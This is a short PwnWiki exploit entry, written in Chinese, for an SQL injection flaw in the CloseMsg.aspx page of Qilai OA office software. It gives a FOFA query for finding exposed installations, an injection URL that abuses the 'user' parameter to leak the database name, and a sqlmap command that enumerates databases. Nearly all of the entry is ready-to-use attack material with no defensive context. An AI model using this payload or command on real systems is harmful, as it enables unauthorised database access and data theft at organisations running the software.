啟萊OA CloseMsg.aspx SQL注入漏洞
From PwnWiki
FOFA
app="启莱OA"
存在SQL注入的文件為 CloseMsg.aspx:
http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1
SQLMAP
sqlmap -u "http://xxx.xxx.xxx.xxx/client/CloseMsg.aspx?user=' and (select db_name())>0--&pwd=1" -p user --dbs
